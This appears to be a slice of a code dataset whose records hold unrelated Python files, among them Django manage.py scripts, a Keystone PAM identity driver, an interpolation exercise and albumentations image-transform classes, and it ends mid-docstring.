'n03623556', #knife (2)\n 'n03862676', #oven (2)\n 'n04490091', #truck (7)\n ],\n 'big_12': ['n02084071', #dog (100+)\n 'n04341686', #structure (55)\n 'n01503061', #bird (52)\n 'n03051540', #clothing (48)\n 'n04576211', #wheeled vehicle\n 'n01661091', #reptile, reptilian (36)\n 'n02075296', #carnivore\n 'n02159955', #insect (27)\n 'n03800933', #musical instrument (26)\n 'n07555863', #food (24)\n 'n03405725', #furniture (21)\n 'n02469914', #primate (20)\n ],\n\t'mid_12': ['n02084071', #dog (100+)\n 'n01503061', #bird (52)\n 'n04576211', #wheeled vehicle\n 'n01661091', #reptile, reptilian (36)\n 'n02075296', #carnivore\n 'n02159955', #insect (27)\n 'n03800933', #musical instrument (26)\n 'n07555863', #food (24)\n 'n03419014', #garment (24)\n 'n03405725', #furniture (21)\n 'n02469914', #primate (20)\n 'n02512053', #fish (16)\n ]\n }\n\n if group_name in common_groups:\n superclass_wnid = common_groups[group_name]\n return superclass_wnid\n else:\n raise ValueError(\"Custom group does not exist\")\n\n"} {"ext": "py", "sha": "1a31263932a29b4ff86adc4d6d9bc6d8ae06de64", "content": "import Sofa\nimport sys\n\n\n\n\ndef createScene(rootNode):\n rootNode.createObject('PythonScriptController', filename=__file__, classname=\"AllocationTestController\")\n return rootNode\n\n\n\n\nclass AllocationTestController(Sofa.PythonScriptController):\n\n node = None\n subnode = None\n\n def onLoaded(self,node):\n self.node = node\n\n\n def add(self):\n # adding components in the scene, that increment a counter at each construction\n for i in xrange(10):\n self.node.createObject('PythonTestAllocationCounter')\n\n def remove(self):\n # removing all components, the destructor should be called, decrementing the counter\n for o in self.node.getObjects():\n self.node.removeObject(o)\n\n def addSub(self):\n # adding components in subnode, that increment a counter at each construction\n self.subnode = self.node.createChild('subnode')\n for i in xrange(10):\n self.subnode.createObject('PythonTestAllocationCounter')\n\n def removeSub(self):\n # removing subnode should remove all its components\n self.node.removeChild(self.subnode)\n self.subnode = None # this is mandatory not to keep any pointer on the python side\n\n def detachSub(self):\n self.subnode.detachFromGraph()\n self.subnode = None # this is mandatory not to keep any pointer on the python side"} {"ext": "py", "sha": "1a31268410de4ce6cdd92db7096e9f1ed022a5b7", "content": "#!/usr/bin/env python\n\"\"\"Django's command-line utility for administrative tasks.\"\"\"\nimport os\nimport sys\n\n\ndef main():\n \"\"\"Run administrative tasks.\"\"\"\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'product_catalog.settings')\n try:\n from django.core.management import execute_from_command_line\n except ImportError as exc:\n raise ImportError(\n \"Couldn't import Django. Are you sure it's installed and \"\n \"available on your PYTHONPATH environment variable? Did you \"\n \"forget to activate a virtual environment?\"\n ) from exc\n execute_from_command_line(sys.argv)\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a3127916955bafed5ddcc1a0a682fe2be048bd0", "content": "import sys\nfrom pbsuite.utils.FileHandlers import FastqFile, M5File\nfrom pbsuite.jelly.Support import AlignmentConnector, SUPPORTFLAGS\n\n\"\"\"\nNeed to do work here\n\"\"\"\nif __name__ == '__main__':\n connector = AlignmentConnector()\n aligns = connector.parseAlignments(M5File(sys.argv[1]))\n\n reads = FastqFile(sys.argv[2])\n\n bestScore = None\n best = None\n fout = open(\"reads.fastq\",'w')\n spanCount = 0\n for readGroup in aligns:\n if readGroup[0].qname.startswith(\"ref\"):\n continue\n if len(readGroup) == 2:\n r1, r2 = readGroup\n a = connector.extendsTarget(r1)\n b = connector.extendsTarget(r2)\n if a != SUPPORTFLAGS.none and b != SUPPORTFLAGS.none:\n spanCount += 1\n print r1.qname, \"spans\"\n \n rStart = min(r1.qend, r2.qend)\n rEnd = max(r1.qstart, r2.qstart)\n t = reads[r1.qname].subSeq(rStart, rEnd)\n fout.write(str(t))\n gout = open(\"seed%d.fasta\" % spanCount, 'w')\n gout.write(\">%s\\n%s\\n\" % (t.name, t.seq))\n gout.close()\n if bestScore is None:\n bestScore = r1.score + r2.score\n best = reads[r1.qname].subSeq(rStart, rEnd)\n else:\n if (r1.score + r2.score) < bestScore:\n best = reads[r1.qname].subSeq(rStart, rEnd)\n else:\n a = readGroup[0]\n if a.tname.endswith('e5'):\n fout.write(str(reads[a.qname].subSeq(0, a.qstart)))\n elif a.tname.endswith('e3'):\n fout.write(str(reads[a.qname].subSeq(a.qend, a.qseqlength)))\n fout.close()\n print \"%d spans\" % spanCount\n fout = open(\"seed.fasta\",'w')\n fout.write(\">%s\\n%s\\n\" % (best.name, best.seq))\n fout.close()\n \n \n"} {"ext": "py", "sha": "1a3128972ac26439b859069f69b68f28340ea86b", "content": "from math import *\r\nfrom prettytable import PrettyTable\r\n\r\ndef func(x, y):\r\n return x * x + y * y\r\n\r\ndef main():\r\n mas_x = []; mas_y = []\r\n tmp_x = []; tmp_y = []; tmp_y2 = []\r\n tmp_x3 = []; tmp_y3 = []\r\n matrix = []\r\n \r\n beg = 0; end = 10\r\n N = abs(end - beg) - 1\r\n eps = 1e-5\r\n \r\n for i in range(beg, end):\r\n tmp_x.append(i)\r\n tmp_y.append(i)\r\n\r\n matrix = create_new_matrix(func, tmp_x, tmp_y)\r\n print_matrix(tmp_x, tmp_y, matrix)\r\n\r\n n_X = int(input(\"input n for X: \"))\r\n n_Y = int(input(\"input n for Y: \"))\r\n x = float(input(\"input x: \"))\r\n y = float(input(\"input y: \"))\r\n \r\n mas_x = create_new_x_y(x, n_X, N, tmp_x)\r\n mas_y = create_new_x_y(y, n_Y, N, tmp_y)\r\n matrix = create_new_matrix(func, mas_x, mas_y)\r\n\r\n new_x = []\r\n for i in range(len(mas_x)):\r\n new_x.append(interpolation(y, n_Y, mas_y, matrix[i]))\r\n \r\n answer = interpolation(x, n_X, mas_x, new_x)\r\n print(\"\\nF(x, y) = \", answer)\r\n \r\ndef print_matrix(tmp_x, tmp_y, matrix):\r\n print(\"|X|Y|\", end = \" \")\r\n for i in range(0, len(tmp_x)):\r\n print(\"{:5d}\".format(tmp_x[i]), end = \" \")\r\n print()\r\n for i in range(0, len(tmp_x)):\r\n print(\"{:3d}\".format(tmp_x[i]),\" \", end = \" \")\r\n for j in range(0, len(tmp_y)):\r\n print( \"{:5d}\".format(matrix[i][j]), end = \" \")\r\n print()\r\n print()\r\n \r\ndef create_new_matrix(f, tmp_x, tmp_y):\r\n matrix = []\r\n for i in range(0, len(tmp_x)):\r\n matrix.append([])\r\n for j in range(0, len(tmp_y)):\r\n matrix[i].append(f(tmp_x[i], tmp_y[j]))\r\n return matrix\r\n\r\ndef create_new_x_y(x, n, N, tmp_x):\r\n mas_x = []\r\n if (x <= tmp_x[0]):\r\n for i in range(0, n + 1):\r\n mas_x.append(tmp_x[i])\r\n elif (x >= tmp_x[N]):\r\n for i in range(len(tmp_x) - (n + 1), len(tmp_x)):\r\n mas_x.append(tmp_x[i])\r\n else:\r\n back = 0; up = 0\r\n for i in range(1, N):\r\n if((tmp_x[i - 1] <= x) and (tmp_x[i] > x)):\r\n up = i; back = i - 1\r\n for k in range(0, n + 1):\r\n if (k % 2 == 0):\r\n if (up < len(tmp_x)):\r\n mas_x.append(tmp_x[up])\r\n up += 1\r\n elif (back >= 0):\r\n mas_x.insert(0, tmp_x[back])\r\n back -= 1\r\n else:\r\n if (back >= 0):\r\n mas_x.insert(0, tmp_x[back])\r\n back -= 1\r\n elif(up < len(tmp_x)):\r\n mas_x.append(tmp_x[up])\r\n up += 1\r\n return mas_x\r\n\r\ndef interpolation(x, n, mas_x, mas_y):\r\n matrix = []\r\n matrix.append([])\r\n for i in range(0, n):\r\n matrix[0].append((mas_y[i] - mas_y[i + 1])/(mas_x[i] - mas_x[i + 1]))\r\n \r\n m = n - 1\r\n for i in range(1, n):\r\n matrix.append([])\r\n for j in range(0, m):\r\n matrix[i].append(((matrix[i - 1][j] - matrix[i - 1][j + 1]))/(mas_x[j] - mas_x[j + 2])) \r\n m -= 1\r\n\r\n y = mas_y[0]\r\n fact = 1\r\n for i in range(0, n):\r\n fact *= (x - mas_x[i])\r\n y += matrix[i][0] * fact\r\n return y\r\n\r\nif __name__ == \"__main__\":\r\n main();\r\n"} {"ext": "py", "sha": "1a312a27eaa0f5dcdf0b5e6df7c8fd74dbb94b86", "content": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2012 OpenStack LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import absolute_import\n\ntry:\n import pam\nexcept ImportError:\n pam = None\n import PAM\n\nfrom keystone import identity\n\n\ndef PAM_authenticate(username, password):\n def _pam_conv(auth, query_list):\n resp = []\n\n for query, q_type in query_list:\n if q_type in [PAM.PAM_PROMPT_ECHO_ON, PAM.PAM_PROMPT_ECHO_OFF]:\n resp.append((password, 0))\n elif q_type in [PAM.PAM_PROMPT_ERROR_MSG,\n PAM.PAM_PROMPT_TEXT_INFO]:\n resp.append(('', 0))\n\n return resp\n\n auth = PAM.pam()\n auth.start('passwd')\n auth.set_item(PAM.PAM_USER, username)\n auth.set_item(PAM.PAM_CONV, _pam_conv)\n\n try:\n auth.authenticate()\n auth.acct_mgmt()\n except PAM.error:\n raise AssertionError('Invalid user / password')\n\n return True\n\n\nclass PamIdentity(identity.Driver):\n \"\"\"Very basic identity based on PAM.\n\n Tenant is always the same as User, root user has admin role.\n \"\"\"\n\n def authenticate(self, user_id, tenant_id, password):\n auth = pam.authenticate if pam else PAM_authenticate\n if auth(user_id, password):\n metadata = {}\n if user_id == 'root':\n metadata['is_admin'] = True\n\n tenant = {'id': user_id, 'name': user_id}\n\n user = {'id': user_id, 'name': user_id}\n\n return (user, tenant, metadata)\n\n def get_project(self, tenant_id):\n return {'id': tenant_id, 'name': tenant_id}\n\n def get_project_by_name(self, tenant_name, domain_id):\n # TODO(henry-nash): Used domain_id once domains are implemented\n # in LDAP backend\n return {'id': tenant_name, 'name': tenant_name}\n\n def get_user(self, user_id):\n return {'id': user_id, 'name': user_id}\n\n def get_user_by_name(self, user_name, domain_id):\n # TODO(henry-nash): Used domain_id once domains are implemented\n # in LDAP backend\n return {'id': user_name, 'name': user_name}\n\n def get_role(self, role_id):\n raise NotImplementedError()\n\n def list_users(self):\n raise NotImplementedError()\n\n def list_roles(self):\n raise NotImplementedError()\n\n def add_user_to_project(self, tenant_id, user_id):\n pass\n\n def remove_user_from_project(self, tenant_id, user_id):\n pass\n\n def get_projects_for_user(self, user_id):\n return [user_id]\n\n def get_roles_for_user_and_project(self, user_id, tenant_id):\n raise NotImplementedError()\n\n def add_role_to_user_and_project(self, user_id, tenant_id, role_id):\n raise NotImplementedError()\n\n def remove_role_from_user_and_project(self, user_id, tenant_id, role_id):\n raise NotImplementedError()\n\n def create_user(self, user_id, user):\n raise NotImplementedError()\n\n def update_user(self, user_id, user):\n raise NotImplementedError()\n\n def delete_user(self, user_id):\n raise NotImplementedError()\n\n def create_project(self, tenant_id, tenant):\n raise NotImplementedError()\n\n def update_project(self, tenant_id, tenant):\n raise NotImplementedError()\n\n def delete_project(self, tenant_id, tenant):\n raise NotImplementedError()\n\n def get_metadata(self, user_id, tenant_id):\n metadata = {}\n if user_id == 'root':\n metadata['is_admin'] = True\n return metadata\n\n def create_metadata(self, user_id, tenant_id, metadata):\n raise NotImplementedError()\n\n def update_metadata(self, user_id, tenant_id, metadata):\n raise NotImplementedError()\n\n def create_role(self, role_id, role):\n raise NotImplementedError()\n\n def update_role(self, role_id, role):\n raise NotImplementedError()\n\n def delete_role(self, role_id):\n raise NotImplementedError()\n"} {"ext": "py", "sha": "1a312b6673a7488eb5e3b7368a7e25de24c8c521", "content": "import configparser\nimport os\nfrom compute.config import AlgorithmConfig\nimport numpy as np\n\nfrom train.utils import TrainConfig\n\n\nclass StatusUpdateTool(object):\n @classmethod\n def clear_config(cls):\n config_file = os.path.join(os.path.dirname(__file__), 'global.ini')\n config = configparser.ConfigParser()\n config.read(config_file)\n config.write(open(config_file, 'w'))\n\n @classmethod\n def __write_ini_file(cls, section, key, value):\n config_file = os.path.join(os.path.dirname(__file__), 'global.ini')\n config = configparser.ConfigParser()\n config.read(config_file)\n config.set(section, key, value)\n config.write(open(config_file, 'w'))\n\n @classmethod\n def __read_ini_file(cls, section, key):\n config_file = os.path.join(os.path.dirname(__file__), 'global.ini')\n config = configparser.ConfigParser()\n config.read(config_file)\n return config.get(section, key)\n\n @classmethod\n def get_num_class(cls):\n return TrainConfig.get_out_cls_num()\n\n @classmethod\n def get_input_weight(cls):\n rs = TrainConfig.get_data_input_size()\n return rs[0]\n\n @classmethod\n def get_input_height(cls):\n rs = TrainConfig.get_data_input_size()\n return rs[1]\n\n @classmethod\n def get_input_channel(cls):\n rs = TrainConfig.get_data_input_size()\n return rs[2]\n\n @classmethod\n def get_init_params(cls):\n g = AlgorithmConfig()\n pop_size = int(g.read_ini_file('pop_size'))\n max_gen = int(g.read_ini_file('max_gen'))\n params = {}\n params['pop_size'] = pop_size\n params['max_gen'] = max_gen\n return params\n\n @classmethod\n def begin_evolution(cls):\n section = 'evolution_status'\n key = 'IS_RUNNING'\n cls.__write_ini_file(section, key, \"1\")\n\n @classmethod\n def end_evolution(cls):\n section = 'evolution_status'\n key = 'IS_RUNNING'\n cls.__write_ini_file(section, key, \"0\")\n\n @classmethod\n def is_evolution_running(cls):\n rs = cls.__read_ini_file('evolution_status', 'IS_RUNNING')\n if rs == '1':\n return True\n else:\n return False\n\n"} {"ext": "py", "sha": "1a312c1d48f208b3f96681ebd098e5fa3d2b98c4", "content": "#!/usr/bin/env python\r\n\"\"\"Django's command-line utility for administrative tasks.\"\"\"\r\nimport os\r\nimport sys\r\n\r\n\r\ndef main():\r\n \"\"\"Run administrative tasks.\"\"\"\r\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'buttonpython.settings')\r\n try:\r\n from django.core.management import execute_from_command_line\r\n except ImportError as exc:\r\n raise ImportError(\r\n \"Couldn't import Django. Are you sure it's installed and \"\r\n \"available on your PYTHONPATH environment variable? Did you \"\r\n \"forget to activate a virtual environment?\"\r\n ) from exc\r\n execute_from_command_line(sys.argv)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n"} {"ext": "py", "sha": "1a312c35f581b6098df5839f4d1517eba53dae60", "content": "import cv2\nimport random\nimport numpy as np\nimport skimage.transform\n\nfrom typing import Union, Optional, Sequence, Tuple, Dict\n\nfrom . import functional as F\nfrom ...core.transforms_interface import DualTransform, to_tuple\n\n__all__ = [\"ShiftScaleRotate\", \"ElasticTransform\", \"Perspective\", \"Affine\", \"PiecewiseAffine\"]\n\n\nclass ShiftScaleRotate(DualTransform):\n \"\"\"Randomly apply affine transforms: translate, scale and rotate the input.\n\n Args:\n shift_limit ((float, float) or float): shift factor range for both height and width. If shift_limit\n is a single float value, the range will be (-shift_limit, shift_limit). Absolute values for lower and\n upper bounds should lie in range [0, 1]. Default: (-0.0625, 0.0625).\n scale_limit ((float, float) or float): scaling factor range. If scale_limit is a single float value, the\n range will be (-scale_limit, scale_limit). Default: (-0.1, 0.1).\n rotate_limit ((int, int) or int): rotation range. If rotate_limit is a single int value, the\n range will be (-rotate_limit, rotate_limit). Default: (-45, 45).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of int,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n shift_limit_x ((float, float) or float): shift factor range for width. If it is set then this value\n instead of shift_limit will be used for shifting width. If shift_limit_x is a single float value,\n the range will be (-shift_limit_x, shift_limit_x). Absolute values for lower and upper bounds should lie in\n the range [0, 1]. Default: None.\n shift_limit_y ((float, float) or float): shift factor range for height. If it is set then this value\n instead of shift_limit will be used for shifting height. If shift_limit_y is a single float value,\n the range will be (-shift_limit_y, shift_limit_y). Absolute values for lower and upper bounds should lie\n in the range [0, 1]. Default: None.\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n shift_limit=0.0625,\n scale_limit=0.1,\n rotate_limit=45,\n interpolation=cv2.INTER_LINEAR,\n border_mode=cv2.BORDER_REFLECT_101,\n value=None,\n mask_value=None,\n shift_limit_x=None,\n shift_limit_y=None,\n always_apply=False,\n p=0.5,\n ):\n super(ShiftScaleRotate, self).__init__(always_apply, p)\n self.shift_limit_x = to_tuple(shift_limit_x if shift_limit_x is not None else shift_limit)\n self.shift_limit_y = to_tuple(shift_limit_y if shift_limit_y is not None else shift_limit)\n self.scale_limit = to_tuple(scale_limit, bias=1.0)\n self.rotate_limit = to_tuple(rotate_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n\n def apply(self, img, angle=0, scale=0, dx=0, dy=0, interpolation=cv2.INTER_LINEAR, **params):\n return F.shift_scale_rotate(img, angle, scale, dx, dy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img, angle=0, scale=0, dx=0, dy=0, **params):\n return F.shift_scale_rotate(img, angle, scale, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n\n def apply_to_keypoint(self, keypoint, angle=0, scale=0, dx=0, dy=0, rows=0, cols=0, **params):\n return F.keypoint_shift_scale_rotate(keypoint, angle, scale, dx, dy, rows, cols)\n\n def get_params(self):\n return {\n \"angle\": random.uniform(self.rotate_limit[0], self.rotate_limit[1]),\n \"scale\": random.uniform(self.scale_limit[0], self.scale_limit[1]),\n \"dx\": random.uniform(self.shift_limit_x[0], self.shift_limit_x[1]),\n \"dy\": random.uniform(self.shift_limit_y[0], self.shift_limit_y[1]),\n }\n\n def apply_to_bbox(self, bbox, angle, scale, dx, dy, **params):\n return F.bbox_shift_scale_rotate(bbox, angle, scale, dx, dy, **params)\n\n def get_transform_init_args(self):\n return {\n \"shift_limit_x\": self.shift_limit_x,\n \"shift_limit_y\": self.shift_limit_y,\n \"scale_limit\": to_tuple(self.scale_limit, bias=-1.0),\n \"rotate_limit\": self.rotate_limit,\n \"interpolation\": self.interpolation,\n \"border_mode\": self.border_mode,\n \"value\": self.value,\n \"mask_value\": self.mask_value,\n }\n\n\nclass ElasticTransform(DualTransform):\n \"\"\"Elastic deformation of images as described in [Simard2003]_ (with modifications).\n Based on https://gist.github.com/ernestum/601cdf56d2b424757de5\n\n .. [Simard2003] Simard, Steinkraus and Platt, \"Best Practices for\n Convolutional Neural Networks applied to Visual Document Analysis\", in\n Proc. of the International Conference on Document Analysis and\n Recognition, 2003.\n\n Args:\n alpha (float):\n sigma (float): Gaussian filter parameter.\n alpha_affine (float): The range will be (-alpha_affine, alpha_affine)\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n approximate (boolean): Whether to smooth displacement map with fixed kernel size.\n Enabling this option gives ~2X speedup on large images.\n same_dxdy (boolean): Whether to use same random generated shift for x and y.\n Enabling this option gives ~2X speedup.\n\n Targets:\n image, mask\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n alpha=1,\n sigma=50,\n alpha_affine=50,\n interpolation=cv2.INTER_LINEAR,\n border_mode=cv2.BORDER_REFLECT_101,\n value=None,\n mask_value=None,\n always_apply=False,\n approximate=False,\n same_dxdy=False,\n p=0.5,\n ):\n super(ElasticTransform, self).__init__(always_apply, p)\n self.alpha = alpha\n self.alpha_affine = alpha_affine\n self.sigma = sigma\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.approximate = approximate\n self.same_dxdy = same_dxdy\n\n def apply(self, img, random_state=None, interpolation=cv2.INTER_LINEAR, **params):\n return F.elastic_transform(\n img,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n interpolation,\n self.border_mode,\n self.value,\n np.random.RandomState(random_state),\n self.approximate,\n self.same_dxdy,\n )\n\n def apply_to_mask(self, img, random_state=None, **params):\n return F.elastic_transform(\n img,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n cv2.INTER_NEAREST,\n self.border_mode,\n self.mask_value,\n np.random.RandomState(random_state),\n self.approximate,\n self.same_dxdy,\n )\n\n def get_params(self):\n return {\"random_state\": random.randint(0, 10000)}\n\n def get_transform_init_args_names(self):\n return (\n \"alpha\",\n \"sigma\",\n \"alpha_affine\",\n \"interpolation\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n \"approximate\",\n \"same_dxdy\",\n )\n\n\nclass Perspective(DualTransform):\n \"\"\"Perform a random four point perspective transform of the input.\n\n Args:\n scale (float or (float, float)): standard deviation of the normal distributions. These are used to sample\n the random distances of the subimage's corners from the full image's corners.\n If scale is a single float value, the range will be (0, scale). Default: (0.05, 0.1).\n keep_size (bool): Whether to resize image’s back to their original size after applying the perspective\n transform. If set to False, the resulting images may end up having different shapes\n and will always be a list, never an array. Default: True\n pad_mode (OpenCV flag): OpenCV border mode.\n pad_val (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n Default: 0\n mask_pad_val (int, float, list of int, list of float): padding value for mask\n if border_mode is cv2.BORDER_CONSTANT. Default: 0\n fit_output (bool): If True, the image plane size and position will be adjusted to still capture\n the whole image after perspective transformation. (Followed by image resizing if keep_size is set to True.)\n Otherwise, parts of the transformed image may be outside of the image plane.\n This setting should not be set to True when using large scale values as it could lead to very large images.\n Default: False\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n scale=(0.05, 0.1),\n keep_size=True,\n pad_mode=cv2.BORDER_CONSTANT,\n pad_val=0,\n mask_pad_val=0,\n fit_output=False,\n interpolation=cv2.INTER_LINEAR,\n always_apply=False,\n p=0.5,\n ):\n super().__init__(always_apply, p)\n self.scale = to_tuple(scale, 0)\n self.keep_size = keep_size\n self.pad_mode = pad_mode\n self.pad_val = pad_val\n self.mask_pad_val = mask_pad_val\n self.fit_output = fit_output\n self.interpolation = interpolation\n\n def apply(self, img, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective(\n img, matrix, max_width, max_height, self.pad_val, self.pad_mode, self.keep_size, params[\"interpolation\"]\n )\n\n def apply_to_bbox(self, bbox, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective_bbox(bbox, params[\"rows\"], params[\"cols\"], matrix, max_width, max_height, self.keep_size)\n\n def apply_to_keypoint(self, keypoint, matrix=None, max_height=None, max_width=None, **params):\n return F.perspective_keypoint(\n keypoint, params[\"rows\"], params[\"cols\"], matrix, max_width, max_height, self.keep_size\n )\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params):\n h, w = params[\"image\"].shape[:2]\n\n scale = np.random.uniform(*self.scale)\n points = np.random.normal(0, scale, [4, 2])\n points = np.mod(np.abs(points), 1)\n\n # top left -- no changes needed, just use jitter\n # top right\n points[1, 0] = 1.0 - points[1, 0] # w = 1.0 - jitter\n # bottom right\n points[2] = 1.0 - points[2] # w = 1.0 - jitt\n # bottom left\n points[3, 1] = 1.0 - points[3, 1] # h = 1.0 - jitter\n\n points[:, 0] *= w\n points[:, 1] *= h\n\n # Obtain a consistent order of the points and unpack them individually.\n # Warning: don't just do (tl, tr, br, bl) = _order_points(...)\n # here, because the reordered points is used further below.\n points = self._order_points(points)\n tl, tr, br, bl = points\n\n # compute the width of the new image, which will be the\n # maximum distance between bottom-right and bottom-left\n # x-coordiates or the top-right and top-left x-coordinates\n min_width = None\n max_width = None\n while min_width is None or min_width < 2:\n width_top = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n width_bottom = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n max_width = int(max(width_top, width_bottom))\n min_width = int(min(width_top, width_bottom))\n if min_width < 2:\n step_size = (2 - min_width) / 2\n tl[0] -= step_size\n tr[0] += step_size\n bl[0] -= step_size\n br[0] += step_size\n\n # compute the height of the new image, which will be the maximum distance between the top-right\n # and bottom-right y-coordinates or the top-left and bottom-left y-coordinates\n min_height = None\n max_height = None\n while min_height is None or min_height < 2:\n height_right = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n height_left = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n max_height = int(max(height_right, height_left))\n min_height = int(min(height_right, height_left))\n if min_height < 2:\n step_size = (2 - min_height) / 2\n tl[1] -= step_size\n tr[1] -= step_size\n bl[1] += step_size\n br[1] += step_size\n\n # now that we have the dimensions of the new image, construct\n # the set of destination points to obtain a \"birds eye view\",\n # (i.e. top-down view) of the image, again specifying points\n # in the top-left, top-right, bottom-right, and bottom-left order\n # do not use width-1 or height-1 here, as for e.g. width=3, height=2\n # the bottom right coordinate is at (3.0, 2.0) and not (2.0, 1.0)\n dst = np.array([[0, 0], [max_width, 0], [max_width, max_height], [0, max_height]], dtype=np.float32)\n\n # compute the perspective transform matrix and then apply it\n m = cv2.getPerspectiveTransform(points, dst)\n\n if self.fit_output:\n m, max_width, max_height = self._expand_transform(m, (h, w))\n\n return {\"matrix\": m, \"max_height\": max_height, \"max_width\": max_width, \"interpolation\": self.interpolation}\n\n @classmethod\n def _expand_transform(cls, matrix, shape):\n height, width = shape\n # do not use width-1 or height-1 here, as for e.g. width=3, height=2, max_height\n # the bottom right coordinate is at (3.0, 2.0) and not (2.0, 1.0)\n rect = np.array([[0, 0], [width, 0], [width, height], [0, height]], dtype=np.float32)\n dst = cv2.perspectiveTransform(np.array([rect]), matrix)[0]\n\n # get min x, y over transformed 4 points\n # then modify target points by subtracting these minima => shift to (0, 0)\n dst -= dst.min(axis=0, keepdims=True)\n dst = np.around(dst, decimals=0)\n\n matrix_expanded = cv2.getPerspectiveTransform(rect, dst)\n max_width, max_height = dst.max(axis=0)\n return matrix_expanded, int(max_width), int(max_height)\n\n @staticmethod\n def _order_points(pts: np.ndarray) -> np.ndarray:\n pts = np.array(sorted(pts, key=lambda x: x[0]))\n left = pts[:2] # points with smallest x coordinate - left points\n right = pts[2:] # points with greatest x coordinate - right points\n\n if left[0][1] < left[1][1]:\n tl, bl = left\n else:\n bl, tl = left\n\n if right[0][1] < right[1][1]:\n tr, br = right\n else:\n br, tr = right\n\n return np.array([tl, tr, br, bl], dtype=np.float32)\n\n def get_transform_init_args_names(self):\n return (\"scale\", \"keep_size\", \"pad_mode\", \"pad_val\", \"mask_pad_val\", \"fit_output\", \"interpolation\")\n\n\nclass Affine(DualTransform):\n \"\"\"Augmentation to apply affine transformations to images.\n This is mostly a wrapper around the corresponding classes and functions in OpenCV.\n\n Affine transformations involve:\n\n - Translation (\"move\" image on the x-/y-axis)\n - Rotation\n - Scaling (\"zoom\" in/out)\n - Shear (move one side of the image, turning a square into a trapezoid)\n\n All such transformations can create \"new\" pixels in the image without a defined content, e.g.\n if the image is translated to the left, pixels are created on the right.\n A method has to be defined to deal with these pixel values.\n The parameters `cval` and `mode` of this class deal with this.\n\n Some transformations involve interpolations between several pixels\n of the input image to generate output pixel values. The parameters `interpolation` and\n `mask_interpolation` deals with the method of interpolation used for this.\n\n Args:\n scale (number, tuple of number or dict): Scaling factor to use, where ``1.0`` denotes \"no change\" and\n ``0.5`` is zoomed out to ``50`` percent of the original size.\n * If a single number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``.\n That value will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, resulting in samples that differ between the axes.\n translate_percent (None, number, tuple of number or dict): Translation as a fraction of the image height/width\n (x-translation, y-translation), where ``0`` denotes \"no change\"\n and ``0.5`` denotes \"half of the axis size\".\n * If ``None`` then equivalent to ``0.0`` unless `translate_px` has a value other than ``None``.\n * If a single number, then that value will be used for all images.\n * If a tuple ``(a, b)``, then a value will be uniformly sampled per image from the interval ``[a, b]``.\n That sampled fraction value will be used identically for both x- and y-axis.\n * If a dictionary, then it is expected to have the keys ``x`` and/or ``y``.\n Each of these keys can have the same values as described above.\n Using a dictionary allows to set different values for the two axis and sampling will then happen\n *independently* per axis, 